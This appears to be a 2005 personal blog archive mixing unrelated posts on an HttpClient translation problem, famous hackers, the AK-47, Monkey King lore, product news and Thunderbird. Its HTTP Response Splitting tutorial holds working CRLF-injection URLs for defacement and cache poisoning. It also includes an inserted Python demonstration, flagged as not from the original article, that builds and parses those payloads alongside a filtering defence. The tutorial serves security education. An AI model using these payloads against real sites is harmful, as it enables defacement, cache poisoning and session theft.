2005-08-28

HttpClient GET and POST



A problem I ran into using org.apache.commons.httpclient.

Because
http://www.google.com/translate_t offers online translation.

After analysing the HTML, I wrote a small program using Apache's HttpClient.

Using httpGetMethod.getResponseBodyAsString() to fetch the page HTML directly from
http://www.google.com/translate_t?hl=en&ie=UTF-8&text=test&langpair=en|zh-CN
and then filtering it, I got "测试", the translation of "test".

But in the last few days I suddenly found Google returning this message:
Your client does not have permission to get URL:
/translate_t?hl=en&ie=UTF-8&text=test&langpair=en%7Czh-CN
from this server.

Both "&" and "|" were encoded......
I can't work out why......

Today it suddenly occurred to me that maybe I shouldn't be doing a GET directly......
I should POST the values of hl, ie, text and langpair
to http://www.google.com/translate_t......

Heh, I don't know whether this idea is right; I'll verify it when I have time......

2005-08-12

Famous Hackers (Great Hackers)



(This list includes some crackers.)

* Richard Matthew Stallman: the traditional great hacker; in 1971 Stallman was hired as a programmer at the MIT Artificial Intelligence Laboratory.
* Ken Thompson and Dennis Ritchie: programmers in the computer science research group at Bell Labs. The two created the Unix operating system in 1969.
* John Draper (known as Captain Crunch): discovered how to make free phone calls with a plastic whistle.
* Mark Abene (known as Phiber Optik): inspired countless American teenagers to "study" how the US internal telephone system works.
* Robert Morris: Cornell graduate who in 1988 accidentally released the first Internet worm.
* Kevin Mitnick: the first cracker to be placed on the FBI's most-wanted list. He now assists the FBI with computer security and plans to publish a book about the exploits of famous crackers.
* Kevin Poulsen: in 1990 Poulsen took control of all the phone lines into Los Angeles radio station KIIS-FM and so won the prize in the station's listener contest.
* Vladimir Levin: this mathematician led a Russian cracker group that tricked Citibank into transferring them US$10 million.
* Steve Wozniak: co-founder of Apple Computer, now an elementary school teacher.
* Tsutomu Shimomura: computer security expert whose systems Kevin Mitnick broke into at the end of 1994 using TCP session hijacking (IP spoofing). Shimomura then helped the FBI trace Mitnick, which led to Mitnick's arrest in February 1995.
* Linus Torvalds: wrote the famous Linux kernel in 1991 while a computer science student at the University of Helsinki, Finland.
* Johan Helsingius: ran anon.penet.fi, the most popular anonymous remailer in the world, and his troubles followed from it. The worst came when the Church of Scientology complained that a penet.fi user had posted church secrets online; Finnish police searched him in 1995, and he shut the remailer down in 1996.
* Eric Steven Raymond: Raymond has long been active in the computer world, working on all kinds of system development. He is even more devoted to developing and promoting free software, writing articles and giving talks, and has made a great contribution to the free software movement. His essays such as "The Cathedral and the Bazaar" are classics of the free software community; it was under the influence of that essay that Netscape decided to open its source code, making the browser an important member of the free software family.

AK-47



AK-47 is formed from the initial letters of the Russian Автомат Калашникова образца 1947 года, meaning "Kalashnikov automatic rifle, model of 1947". Designed by Mikhail Timofeyevich Kalashnikov and produced at the Izhevsk arms plant, it was finalised in 1947, began to be issued to the Soviet army in 1951, and fires the 7.62×39 mm M1943 cartridge. From the 1950s to the 1980s it was used in large numbers by the Soviet army and the armies of the Warsaw Pact countries. It is an assault rifle of medium calibre (7.62 mm, roughly .30 calibre) capable of semi-automatic or fully automatic fire. Compared with the rifles of the Second World War it is smaller and has a shorter range.

The AK-47 is cheap and effective, easy to carry, and easy to clean and maintain. Its accuracy suffers mainly because the muzzle climbs badly in full-automatic fire, the short barrel gives a short sight radius, and the sights are not ideally designed. The improved AKM, which went into production in 1959, partly remedied these shortcomings. Apart from a pin occasionally breaking during case ejection, it is extremely reliable, keeping up good performance in deserts, tropical rainforest, severe cold and other extremely harsh conditions, which earned it the title "king of rifles". During the Vietnam War many US soldiers discarded their M16s or M14s, which coped badly with the harsh conditions of the jungle, and picked up the AK-47s used by Vietnamese soldiers, simply because the AK-47 was so reliable.

After the improved AK-74 was issued to the Soviet army in the 1980s, the AK-47 series was withdrawn from Soviet service.

Because the AK-47 and its derivatives are flexible and easy to use, simple to manufacture and cheap, they are popular with non-Western countries. The armies and rebel forces of many Third World countries, and even of Western countries, make wide use of the cheap and effective AK-47. Many countries have produced copies or licensed versions, including Israel, Finland, Hungary, China, Poland and Romania, and production continues today. The AK-47's design has also influenced infantry weapon design in several countries.

AK-47 technical specifications:

Calibre: 7.62 mm

Cartridge: M1943 7.62×39 mm intermediate rifle cartridge

Operation: gas-operated

Locking: rotating bolt

Feed: 30-round magazine

Fire modes: full-automatic / semi-automatic

Loaded weight: 4.8 kg

Muzzle velocity: 710 m/s

Effective range: 300 m

Practical rate of fire: 100 rounds/min (full-automatic)

The AK-47 was also for a time a favourite weapon of criminals. In the past, Hong Kong police carried sidearms mainly for self-defence and so were issued only .38 revolvers. Later, gangsters such as Kwai Ping-hung and Cheung Tze-keung repeatedly committed crimes in Hong Kong armed with powerful AK-47 automatic rifles, and for a time the Hong Kong police were at a loss. Only after upgrading their firepower and strengthening intelligence and other supporting departments was the situation turned around and the criminals brought to justice.

The Seventy-two Transformations



The seventy-two transformations are not described in detail in Journey to the West; the book says only this:

The Patriarch said: "Very well. Which kind do you want to learn? There is the Heavenly Ladle number, with thirty-six transformations, and there is the Earthly Fiend number, with seventy-two transformations." Wukong said: "Your disciple would rather grasp more; let me learn the Earthly Fiend transformations." The Patriarch said: "In that case, come forward and I will pass you the oral formula." He then whispered in his ear, and no one knows what wonderful method he taught. This Monkey King was one of those for whom, once one aperture opens, all hundred open; having learned the formula he practised on his own and mastered all seventy-two transformations.

Sun Wukong first used the "seventy-two transformations" to show off in front of his fellow disciples, turning into a pine tree, and it was for this that the Patriarch Subhuti drove him away.

What Sun Wukong uses most often is turning into a small flying insect. The "seventy-two transformations" also include the water-avoidance formula, the fire-avoidance formula, the body-division formula, the sky-flying formula, the earth-tunnelling formula, the transformation formula (turning into all kinds of things), the summoning formula (which can summon deities such as the local earth god), and "three heads and six arms" (used during the havoc in Heaven).

2005-08-06

Rojo


Subscribe in Rojo

2005-08-05

PlayStation 3 To Support Mac OS X Tiger?

AppleInsider is reporting that Sony's PlayStation 3 gaming console will support Apple's Mac OS X Tiger operating system. "Sony is expected to offer optional hard drives for the PlayStation 3 with potential memory capacity of 80 or 120 GB. It remains to be decided whether the standard version of the PS3 will come complete with a hard drive. The operating system has also yet to be clarified. The integrated Cell processor will be able to support a variety of operating systems (such as Linux or Apple's Tiger)."

2005-08-03

Start.com News

MSN continually seeks to innovate in order to make the web faster, more organized, and personal for consumers. Start.com is one of many incubation projects to achieve this goal. It is an experimental project that launched with start.com/1 in early March 2005. Start.com/2 launched a few weeks later and /3 on June 3.

MSN Messenger 1.0.0863



Click here to download
MSN Messenger 1.0.0863 uses virtually no memory, includes Sfyx to allow it to sign in, and doesn't look crap because it's got Messenger 7 graphics.
Also check out readme here.

2005-08-02

shine's Time



What is HTTP Response Splitting?



Wang Products :: Article
A quick read through the latest vulnerability news on popular security sites such as SecurityFocus or Help Net Security (see our security page for the latest headlines) will usually reveal a number of new exploits found in popular PHP scripts (such as PHP-Nuke, phpBB, Mambo, etc).

Most of the time these exploits will be categorised as "SQL Injection" or "XSS (Cross-Site Scripting)" vulnerabilities, as these are the most common flaws found in PHP/ASP/Perl scripts today. However, in recent months you may have seen reports of scripts being vulnerable to something fairly new - called "HTTP Response Splitting".

The purpose of this FAQ is to give you a brief introduction into what HTTP Response Splitting is, how it occurs, and why it is dangerous.

First of all, you need to understand what "headers" are in the context of this FAQ article. By "headers", I do not mean HTML page headers or anything to do with HTML. We are talking about HTTP headers. HTTP headers are small data fields that accompany a Web-based message and help the software that is going to use that message make sense out of it.

For example, request a page using an ordinary web browser and, along with the request itself, a set of HTTP headers will be sent to the server where the page resides. Here are the headers your web browser might send to Google when you visit their site:


GET / HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;...
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7


This provides the web server with a lot of information it needs in order to satisfy your request to view the Google web site, and it also provides Google with a fair bit of extra information that might be of use (in the example above, it tells them the operating system I use and which web browser I have).

The web server then sends HTTP headers back to your browser containing a lot of information that your browser needs to know (including a status code which tells you the result of your request). Here are the typical headers Google might send back to you:


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Content-Encoding: gzip
Server: GWS/2.1
Content-Length: 1040
Date: Tue, 02 May 2005 17:33:58 GMT


If you want to see what HTTP headers your system is sending/receiving, there are many ways to do so. The best/easiest way is to use a tool like Proxomitron (which acts as a local proxy server for your browser and shows you all HTTP headers that are sent/received), or, even better, if you use the Firefox web browser you can get a plugin called LiveHTTPHeaders to do the job :)

Put simply, HTTP Response Splitting occurs when someone is able to inject their own data into the HTTP headers that the server sends to a web browser. Typically, an attacker will achieve this by crafting a POST or GET request to a vulnerable PHP/ASP/Perl script, containing data designed to add extra HTTP headers which cause the victim's browser to do what the attacker wants :)

So, what does the attacker want to achieve by exploiting HTTP Response Splitting? Well, it can be used for the following purposes:


* XSS (Cross-Site Scripting) - HTTP Response Splitting can be used to execute arbitrary HTML/JavaScript code in the victim's browser (which can lead to cookie/session hijacking) - see our FAQ article entitled "What is Cross Site Scripting (css/xss) ?" for more information on this type of exploit.

* Cache poisoning - the attacker can surf through a proxy server when he exploits the HTTP Response Splitting vulnerability, fooling the proxy server into caching the "injected" HTTP header responses from the server and therefore making the website/server appear defaced to anyone who uses that proxy/cache. HTTP Response Splitting can also be used to poison browser caches, so that the victims browser will cache the defaced/bad page instead of the real one. The cache will continue to give the victim the bad page until their cache is cleared or cleaned.

* Cross user defacement - this is where the attacker makes the web site appear defaced to a particular user (the victim), which in turn lets the attacker steal session data, cookies, etc. It also lets the attacker steal login information by presenting a fake login screen for the website, leading to account compromise.

* Hijacking pages - the attacker obtains the server's response that was intended for another client, gaining access to sensitive information that is confidential or not normally accessible to the attacker; in effect, sensitive data on its way from the server to the client is stolen by the attacker.



HTTP Response Splitting can occur in any script/program that takes user input and outputs it into HTTP headers without filtering the user input for bad characters first (yes, this is yet another vulnerability made possible by poor user input filtering). As we have discussed in previous FAQ articles, you should NEVER trust user input, and should always filter out "bad" characters before you work with variables that contain user input from forms (or from query strings via GET).

So - which are the bad characters in this case? Well...the bad characters are actually the carriage return character (CR) and the line-feed character (LF), or as they are more often represented: \r\n:


CR = %0d = \r
LF = %0a = \n


If these characters are not filtered out of user input which gets printed out into HTTP headers by a script/program - then they will be interpreted as a new line, and the start of a new HTTP header item. Can you see where this is going? :)

Let's take a look at what a standard 302 (page redirection) header looks like. This header (when sent to your web browser) causes your browser to redirect from whichever page you requested to some other page specified in the header. The PHP code to generate this 302 redirection header is as follows:


<?php
header ("Location: " . $_GET['page']);
?>


This code above outputs a "Location" header to your browser, which causes your browser to redirect to the page specified in the GET "page" string. So for example, if you accessed the above PHP script like this:


http://www.example.com/thescript.php?page=http://www.wangproducts.com


You would be redirected to http://www.wangproducts.com because your web browser would receive the following headers:


HTTP/1.1 302 Found\r\n
Date: Thu, 06 May 2005 12:15:10 GMT\r\n
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d\r\n
Location: http://www.wangproducts.com\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/html\r\n


Now www.wangproducts.com will respond with a normal 200 OK response and the user will see the pages at www.wangproducts.com. Notice the "\r\n" carriage return and line feed characters at the end of each line in the HTTP headers.

What you should be thinking at this point is...what happens if I inject my own \r\n characters into the GET "page" string, and then add my own headers after? :) Will they be interpreted as extra headers and sent to my browser? The answer is - yes :) as long as the PHP script does not filter the \r\n out (which our PHP script above does not).

Let's test this out! What if we were to alter the URL above to contain \r\n (we will add them as %0d and %0a, because this is how \r and \n are represented when they are provided via a GET/query string)? We can end the server's 302 response early, add our own 200 OK status line and headers, and then add some HTML, so that the victim's browser will display the HTML instead of redirecting to www.wangproducts.com :) Here is how we do this:


http://www.example.com/thescript.php?page=%0d%0aContent-Length:%200%0d%0aContent-Type:%20text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cb%3EI%20HACKED%20YOU%3C/b%3E%3C/html%3E

I know this looks insane, but when you decode the URL encoding, it translates to us putting the following into the GET "page" variable (the first empty line ends the header block of the server's 302 response, and the second ends the header block of our forged 200 response):


\r\n
Content-Length: 0\r\n
Content-Type: text/html\r\n
\r\n
HTTP/1.1 200 OK\r\n
Content-Type: text/html\r\n
\r\n
<html><b>I HACKED YOU</b></html>


Since the PHP code does not filter out our \r\n and passes our data directly into the header() function, our headers are injected into the HTTP headers and sent to our browser. This means we have just temporarily "defaced" the site :) The HTTP headers your browser actually receives are as follows:


HTTP/1.1 302 Found
Date: Thu, 06 May 2005 12:15:10 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Location:
Content-Length: 0
Content-Type: text/html

HTTP/1.1 200 OK
Content-Type: text/html

<html><b>I HACKED YOU</b></html>
Transfer-Encoding: chunked
Content-Type: text/html


As we can see above, the server sends its normal 302 response, but the arbitrary input we supplied in the Location header terminates that response (Content-Length: 0) and starts a new 200 OK response, which presents our data to the user as if it were a normal web server reply; the server's own trailing headers simply end up inside the body of our fake page. This technique is a form of XSS (cross-site scripting): with the right JavaScript in place of the plain HTML, the HTTP Response Splitting vulnerability executes code in the victim's browser, which can lead to their cookie/session being hijacked.

If you want to test the cache poisoning implications of this vulnerability, all you need to do is inject Last-Modified, Cache-Control, or Pragma headers into the forged response, so that the "defaced" page becomes cached. You can look up how to use headers like Last-Modified in a good search engine like Google :)

So - how do we defend against this if we are a PHP/ASP/Perl coder? Simple - by correctly filtering user input! You should NEVER trust user input unless it has been filtered (and even then...don't trust it! always be cautious). For examples of how to filter user input in PHP/ASP - see my other article "SQL Injection Vulnerabilities".
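The 302/200 split walked through above, the cache-poisoning variant, and the filtering fix, as one added example (written in Python rather than PHP so it can be run stand-alone; it is not code from the original article). The PHP header() call is modelled as a function that assembles the raw response text, a minimal parser then reads that text the way a proxy or browser would, and a hardened redirect rejects CR/LF. The Apache banner, the dates and the cache-poisoning payload are constructed samples; the defacement payload is the one from the article.

```python
"""HTTP Response Splitting (CRLF injection) worked through end to end.
Added example, not code from the original article: the article's PHP
redirect is modelled, then parsed the way a proxy or browser would."""
from urllib.parse import unquote

CRLF = "\r\n"

# Constructed: what the article's Apache server writes around Location.
SERVER_HEADERS_BEFORE = [
    "HTTP/1.1 302 Found",
    "Date: Thu, 06 May 2005 12:15:10 GMT",
    "Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d",
]
SERVER_HEADERS_AFTER = ["Transfer-Encoding: chunked", "Content-Type: text/html"]

# The article's defacement payload, as it travels in the query string.
DEFACE_PAYLOAD = (
    "%0d%0aContent-Length:%200%0d%0aContent-Type:%20text/html%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a"
    "%3Chtml%3E%3Cb%3EI%20HACKED%20YOU%3C/b%3E%3C/html%3E"
)

# Constructed cache-poisoning variant: the forged 200 response carries
# Last-Modified and Cache-Control so a shared cache keeps serving it.
CACHE_POISON_PAYLOAD = (
    "%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Last-Modified:%20Mon,%2001%20Jan%202035%2000:00:00%20GMT%0d%0a"
    "Cache-Control:%20public,%20max-age=31536000%0d%0a%0d%0a"
    "%3Chtml%3E%3Cb%3EI%20HACKED%20YOU%3C/b%3E%3C/html%3E"
)

def vulnerable_redirect(page):
    """header("Location: " . $_GET['page']) with no filtering: any CR/LF in
    the (already URL-decoded) value lands straight in the header block."""
    lines = SERVER_HEADERS_BEFORE + ["Location: " + page] + SERVER_HEADERS_AFTER
    return CRLF.join(lines) + CRLF + CRLF

class HeaderInjection(ValueError):
    """Raised when a header value contains a line terminator."""

def safe_redirect(page):
    """Hardened version: refuse any value that could start a new header line.
    Rejecting beats silent stripping (which hides a hostile request), and a
    bare LF is honoured by some clients, so both characters are checked."""
    if "\r" in page or "\n" in page:
        raise HeaderInjection("CR/LF in redirect target: %r" % page)
    return vulnerable_redirect(page)  # same emitter, now with a vetted value

def split_responses(stream):
    """Parse a response stream like a naive HTTP/1.1 client or proxy.

    A response is a status line, header lines, a blank line, then a body of
    Content-Length bytes when that header is present, otherwise the rest of
    the stream. Whatever follows a Content-Length-delimited body is read as
    the *next* response, which is exactly what splitting relies on.
    """
    responses, pos = [], 0
    while pos < len(stream):
        head_end = stream.find(CRLF + CRLF, pos)
        if head_end < 0:
            break  # truncated: no complete header block left
        status, _, header_block = stream[pos:head_end].partition(CRLF)
        headers = {}
        for line in header_block.split(CRLF):
            if line:
                name, _, value = line.partition(":")
                headers[name.strip()] = value.strip()
        body_start = head_end + 2 * len(CRLF)
        if "Content-Length" in headers:
            body_end = body_start + int(headers["Content-Length"])
        else:
            body_end = len(stream)
        responses.append({"status": status, "headers": headers,
                          "body": stream[body_start:body_end]})
        pos = body_end
    return responses

def client_view(payload_urlencoded, builder=vulnerable_redirect):
    """The responses a client sees for one query-string value."""
    return split_responses(builder(unquote(payload_urlencoded)))

def is_rejected(payload_urlencoded):
    """True if the hardened redirect refuses this query-string value."""
    try:
        safe_redirect(unquote(payload_urlencoded))
    except HeaderInjection:
        return True
    return False

if __name__ == "__main__":
    for name, payload in [("benign", "http://www.wangproducts.com"),
                          ("deface", DEFACE_PAYLOAD), ("cache-poison", CACHE_POISON_PAYLOAD)]:
        seen = client_view(payload)
        print(name, len(seen), "response(s); rejected by safe_redirect:", is_rejected(payload))
        for r in seen:
            print("   ", r["status"], sorted(r["headers"]), repr(r["body"][:32]))
```

Run it and the benign URL yields one 302, while both attacker payloads yield a 302 with an empty Location followed by a forged 200 whose body is the injected HTML; the poisoned variant additionally carries the caching headers a shared proxy would honour. Later PHP releases (4.4.2 and 5.1.2 onward) make header() itself refuse a value containing a newline, but the same bug reappears wherever code writes raw headers from user input, which is why the rejecting check is shown explicitly.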

Some of you might be thinking - is this even worth a whole article? is this a real vulnerability? I mean...who on earth writes PHP code that passes user input into header() functions!! right? ... well the sad answer is, many people do...and many large/popular sites/scripts are vulnerable to this type of attack. Want to see a real life example? check out the recent Phorum vulnerability (Phorum is a well-known PHP forum script, like phpBB).

Sources for this article:


* http://www.phpfreaks.com/tutorials/132/0.php

* http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

* http://www.securityfocus.com/archive/1/393953

Thunderbird



Thunderbird - Reclaim Your Inbox


Thunderbird gives you a faster, safer, and more productive email experience. We designed Thunderbird to prevent viruses and to stop junk mail so you can get back to reading your mail. Read on to find out more about the reasons why you should use Thunderbird as your mail client and RSS reader.

If you've lately taken to cursing at your current e-mail program, then I suggest you give Thunderbird a try. It's the best thing to happen to e-mail in a long time.
- Forbes
This surprisingly full-featured open-source program is a snap to use...
- PC World



Smartest Way to Stop Junk Mail
Thunderbird provides the most effective tools for detecting junk mail. Our tools analyze your e-mail and identify those that are most likely to be junk. You can automatically have your junk mail deleted or you can put it in a folder you specify, just in case you like reading junk mail.


Your Mail, Your Way
View your e-mail the way you want it. Access your e-mail with Thunderbird's new three-column view. Customize your toolbar, change its look with themes, and use Mail Views to quickly sort through your e-mail.


Safe and Secure
Thunderbird provides enterprise and government grade security features such as S/MIME, digital signing, message encryption, support for certificates and security devices.


Packed with Features
Thunderbird gives you IMAP/POP support, a built-in RSS reader, support for HTML mail, powerful quick search, saved search folders, advanced message filtering, message grouping, labels, return receipts, smart address book LDAP address completion, import tools, and the ability to manage multiple e-mail and newsgroup accounts.


Unlimited Features
Thunderbird lets you add additional features as you need them through extensions. Extensions are a powerful tool to help you build a mail client that meets your specific needs.

My BEST Movie: HEAT

Posted by Picasa